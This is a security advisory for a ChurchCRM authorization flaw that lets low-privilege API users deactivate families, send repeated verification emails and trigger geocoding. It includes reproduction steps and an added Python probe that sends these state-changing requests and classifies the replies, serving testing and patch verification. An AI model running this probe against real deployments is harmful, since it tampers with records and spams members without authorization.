ChurchCRM
cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*
- <= 7.0.5
A vulnerability in ChurchCRM prior to version 7.1.0 allows authenticated API users to modify family records without proper authorization. By supplying an arbitrary value for the {familyId} path parameter, a user can bypass role-based access control and change family state through several sensitive endpoints: deactivating or reactivating a family, repeatedly triggering verification emails, and triggering geocoding operations. The root cause is that these endpoints do not check the caller's permissions, so the modifications succeed even for users who lack the EditRecords privilege that is supposed to be required.
Exploitation of this vulnerability allows for unauthorized changes to family records, including verification statuses, activation or deactivation states, and geolocation data. Additionally, it can be used to disrupt services by flooding family members with verification emails.
To reproduce this vulnerability, log in as an authenticated user who does not hold the EditRecords privilege and note a family ID from the family listing. Then send an API request to one of the affected endpoints with that ID substituted into the path, such as '/family/{familyId}/activate/{status}', '/family/{familyId}/verify', or '/family/{familyId}/geocode'. On an affected version the API processes the request and applies the change, whereas a correctly protected endpoint would reject the caller because the permission check fails.
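The following probe turns the steps above into a repeatable authorization check. It is an added example, not ChurchCRM code and not part of the advisory: it builds the three affected paths for a chosen family ID, sends them as a low-privilege user, and classifies each response as "enforced" (401/403), "vulnerable" (2xx) or inconclusive. Two things are assumptions the advisory does not state: that the routes are reached with POST, and that they live under an '/api' prefix. Note that every one of these requests is state-changing on an unpatched server (it can deactivate a family, send an email, or trigger a geocode lookup), so run it only against a disposable test instance and a family you own. The fake sender is a constructed stand-in so the logic can be exercised offline.

```python
"""Probe whether ChurchCRM family-state endpoints enforce EditRecords.

Added example; not ChurchCRM's own code. Assumptions (not in the advisory):
- the endpoints are invoked with POST under an '/api' prefix;
- a patched server rejects a caller lacking EditRecords with 401 or 403.
"""
from __future__ import annotations

from typing import Callable, Dict, List
from urllib import request as urlrequest
from urllib.error import HTTPError

API_PREFIX = "/api"  # assumption: API mount point of the Slim routes

# A sender takes (method, path) and returns the HTTP status code.
Sender = Callable[[str, str], int]


def family_endpoints(family_id: int, status: int = 1) -> List[str]:
    """The three endpoints named in the advisory, with familyId filled in.

    status=1 (reactivate) is used so that probing an already-active family
    changes as little as possible; the email and geocode calls still fire.
    """
    return [
        f"/family/{family_id}/activate/{status}",
        f"/family/{family_id}/verify",
        f"/family/{family_id}/geocode",
    ]


def classify(status_code: int) -> str:
    """Map a response code to an authorization verdict."""
    if status_code in (401, 403):
        return "enforced"      # caller was rejected: the permission check ran
    if 200 <= status_code < 300:
        return "vulnerable"    # a user without EditRecords changed the record
    if status_code == 404:
        return "not-found"     # wrong prefix, wrong family ID, or route removed
    return "inconclusive"


def probe(send: Sender, family_id: int) -> Dict[str, str]:
    """Send every affected endpoint once and return {path: verdict}."""
    return {path: classify(send("POST", path)) for path in family_endpoints(family_id)}


def is_vulnerable(results: Dict[str, str]) -> bool:
    """True if any endpoint accepted the low-privilege caller."""
    return any(verdict == "vulnerable" for verdict in results.values())


def http_sender(base_url: str, session_cookie: str) -> Sender:
    """Real sender for a live target, authenticated as the low-privilege user.

    session_cookie is the raw Cookie header value of a session that lacks
    EditRecords, e.g. 'PHPSESSID=...'. Only use against an instance you own.
    """
    def send(method: str, path: str) -> int:
        url = base_url.rstrip("/") + API_PREFIX + path
        req = urlrequest.Request(url, method=method, data=b"")
        req.add_header("Cookie", session_cookie)
        try:
            with urlrequest.urlopen(req, timeout=10) as resp:
                return resp.status
        except HTTPError as err:
            return err.code  # 401/403 arrive here, not as a return value
    return send


def fake_sender(enforced: bool) -> Sender:
    """Constructed stand-in for an unpatched (<= 7.0.5) or patched server."""
    def send(method: str, path: str) -> int:
        if method != "POST":
            return 405
        return 403 if enforced else 200
    return send


if __name__ == "__main__":
    # Offline demonstration against the constructed fake servers.
    for label, enforced in (("unpatched", False), ("patched", True)):
        results = probe(fake_sender(enforced), family_id=7)
        print(label, "vulnerable" if is_vulnerable(results) else "enforced", results)
```

Against a live test instance, swap `fake_sender(...)` for `http_sender("https://crm.example.test", "PHPSESSID=...")` with a session that does not hold EditRecords. After upgrading to 7.1.0 the same run should report every endpoint as "enforced"; a "not-found" verdict usually means the assumed '/api' prefix does not match the deployment rather than that the issue is fixed.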
Users should update to ChurchCRM version 7.1.0 or later, where this vulnerability has been fixed.